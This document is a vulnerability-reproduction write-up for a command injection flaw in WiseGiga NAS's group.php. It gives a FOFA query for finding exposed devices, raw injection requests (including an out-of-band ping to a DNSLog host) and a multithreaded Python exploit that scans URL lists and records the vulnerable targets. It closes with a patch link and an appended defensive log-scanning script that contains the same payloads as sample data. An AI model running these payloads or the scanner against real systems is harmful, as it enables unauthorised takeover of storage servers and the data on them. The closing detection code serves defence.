Contents
- WiseGiga NAS RCE vulnerability reproduction [with POC]
- 0x01 Preface
- 0x02 Vulnerability description
- 0x03 Affected versions
- 0x04 Vulnerability environment
- 0x05 Vulnerability reproduction
- 1. Access the vulnerable environment
- 2. Build the POC
- 3. Reproduce
- 0x06 Remediation advice
WiseGiga NAS RCE vulnerability reproduction [with POC]
0x01 Preface
Disclaimer: do not use the techniques in this article for illegal testing. Any direct or indirect consequences or losses caused by distributing or using the information or tools provided in this article are the sole responsibility of the user, and none of the resulting harm has anything to do with the author. This article is for learning purposes only!!!
0x02 Vulnerability description
新韩进出口有限公司 (Xinhan Import & Export Co., Ltd.) is a Korean company that sells NAS products. WiseGiga NAS is a Korean "network attached storage" product, a dedicated data storage server. The group.php script of the WiseGiga NAS system contains an arbitrary command execution vulnerability: the group_name parameter is passed to a shell without sanitization, so an attacker can execute arbitrary commands and gain administrative control of the server.
0x03 Affected versions
WiseGiga NAS
0x04 Vulnerability environment
FOFA query: app="WISEGIGA-NAS"
0x05 Vulnerability reproduction
1. Access the vulnerable environment
2. Build the POC
POC (GET)
GET /admin/group.php?memberid=root&cmd=add&group_name=d;id>group.txt HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Length: 0
PS: this remote command execution is blind; the response does not echo the command output, which is why the command's output is redirected into a file (group.txt) that is then fetched separately.
3. Reproduce
Execute a ping command and use a DNSLog service to confirm execution out of band:
GET /admin/group.php?memberid=root&cmd=add&group_name=d;ping+fyfkauyqub.dgrh3.cn HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Length: 0
1. Send the request that writes the file (the POC above).
2. Request the written file to confirm the RCE:
GET /admin/group.txt HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Length: 0
Automated script
(Source: https://github.com/VulnExpo/ExploitHunter/blob/main/WiseGigaNAS_rce_exploit.py)
#coding=UTF-8
import argparse
import sys
import threading

import requests

# The targets use self-signed certificates; silence the TLS verification warning.
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)


def check_for_vulnerability(url, proxies=None, success_file=None):
    """Send the injection request, then read back the file the injected `id` command wrote."""
    try:
        headers = {
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36',
        }
        # paths[0] triggers the injection, paths[1] is the file it writes.
        paths = ['/admin/group.php?memberid=root&cmd=add&group_name=d;id>1.txt', '/admin/1.txt']
        # Step 1: group.php answers with a page containing "window.open" when the request was processed.
        response = requests.get(url + paths[0], headers=headers, proxies=proxies, timeout=10, verify=False)
        if response.status_code == 200 and "window.open" in response.text:
            # Step 2: the output of `id` (a line starting with "uid=") confirms execution.
            response2 = requests.get(url + paths[1], headers=headers, proxies=proxies, timeout=10, verify=False)
            if response2.status_code == 200 and "uid=" in response2.text:
                print(f"目标URL: {url}")
                with open(success_file, 'a') as s_file:
                    s_file.write("++++++++++++++++++\n")
                    s_file.write(f"目标URL: {url}\n")
                    s_file.write(f"响应内容: {response2.text}\n\n")
                return True
    except Exception as e:
        print(f"发生异常:{e}")
    return False


def scan_targets(targets, proxies=None, success_file=None):
    """Check every target in a list sequentially; used as the body of each worker thread."""
    for target in targets:
        target = target.strip()
        if target:
            check_for_vulnerability(target, proxies, success_file)


def multi_threaded_scan(urls, proxies=None, success_file=None, num_threads=4):
    """Split the URL list round-robin across num_threads workers and wait for all of them."""
    threads = []
    for i in range(num_threads):
        thread = threading.Thread(target=scan_targets, args=(urls[i::num_threads], proxies, success_file))
        threads.append(thread)
    for thread in threads:
        thread.start()
    for thread in threads:
        thread.join()


if __name__ == '__main__':
    parser = argparse.ArgumentParser(description="WiseGiga NAS远程命令执行漏洞")
    parser.add_argument("-u", "--url", help="目标URL")
    parser.add_argument("-f", "--file", default="url.txt", help="目标URL列表,默认为url.txt")
    parser.add_argument("-t", "--threads", type=int, default=4, help="线程数,默认为4")
    parser.add_argument("-p", "--proxy", help="代理服务器地址(例如:http://localhost:8080)")
    args = parser.parse_args()

    if not args.url and not args.file:
        print("请使用 -u 指定要扫描的目标URL或使用默认文件 url.txt。")
        sys.exit(1)

    if args.url:
        urls = [args.url]
    else:
        with open(args.file, 'r') as file:
            urls = file.readlines()

    success_file = 'success_targets.txt'
    proxies = {
        "http": args.proxy,
        "https": args.proxy
    } if args.proxy else None

    multi_threaded_scan(urls, proxies, success_file, args.threads)
    print("扫描完成,成功的目标已保存到 success_targets.txt 文件中。")
0x06 Remediation advice
The vendor has released an upgrade patch that fixes this vulnerability. The patch can be obtained from:
http://www.wisegiga.com/
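Until a device is patched, the two request shapes shown above are easy to spot in web-server access logs. The following Python is an added defensive example, not part of the original article or the linked script: it flags group.php requests whose group_name carries shell metacharacters, and then the follow-up fetch of the file an injected command redirected its output into. The combined-log format and the sample lines are constructed for this example.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Characters that belong in a shell command line, not in a NAS group name.
SHELL_META = re.compile(r"[;|&`<>\n]|\$\(")
# Combined-log style access line: client ident user [time] "METHOD target PROTO" status size
LOG_LINE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+) [^"]*" (?P<status>\d{3})')

def query_params(target):
    """Split the query on '&' only: ';' is part of the injected payload, not a separator."""
    params = {}
    for pair in urlsplit(target).query.split("&"):
        if pair:
            key, _, value = pair.partition("=")
            params.setdefault(unquote_plus(key), []).append(unquote_plus(value))
    return params

def inspect_request(target):
    """Return a reason string when a group.php request carries shell metacharacters in group_name."""
    if not urlsplit(target).path.endswith("/admin/group.php"):
        return None
    for value in query_params(target).get("group_name", []):
        if SHELL_META.search(value):
            return f"shell metacharacter in group_name: {value!r}"
    return None

def scan_log(lines):
    """Flag injection attempts, then any later fetch of a file the injected command redirected into."""
    findings, dropped_files = [], set()
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        target = m.group("target")
        reason = inspect_request(target)
        if reason:
            findings.append((m.group("ip"), target, reason))
            for value in query_params(target).get("group_name", []):
                dropped_files.update(re.findall(r">\s*([\w./-]+)", value))
        elif urlsplit(target).path.rsplit("/", 1)[-1] in dropped_files:
            findings.append((m.group("ip"), target, "fetch of a file written by an earlier injection"))
    return findings

# Constructed sample log; addresses are from documentation ranges, the DNS name is a placeholder.
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Jan/2024:10:00:01 +0000] "GET /admin/group.php?memberid=root&cmd=add&group_name=d;id>group.txt HTTP/1.1" 200 512',
    '198.51.100.7 - - [10/Jan/2024:10:00:03 +0000] "GET /admin/group.txt HTTP/1.1" 200 63',
    '198.51.100.9 - - [10/Jan/2024:10:01:00 +0000] "GET /admin/group.php?memberid=root&cmd=add&group_name=d%3Bping+dnslog.example HTTP/1.1" 200 512',
    '203.0.113.5 - - [10/Jan/2024:10:02:00 +0000] "GET /admin/group.php?memberid=admin&cmd=add&group_name=finance HTTP/1.1" 200 512',
]
```

Running scan_log(SAMPLE_LOG) yields three findings: the two injection requests and the read-back of group.txt, while the legitimate group creation is left alone.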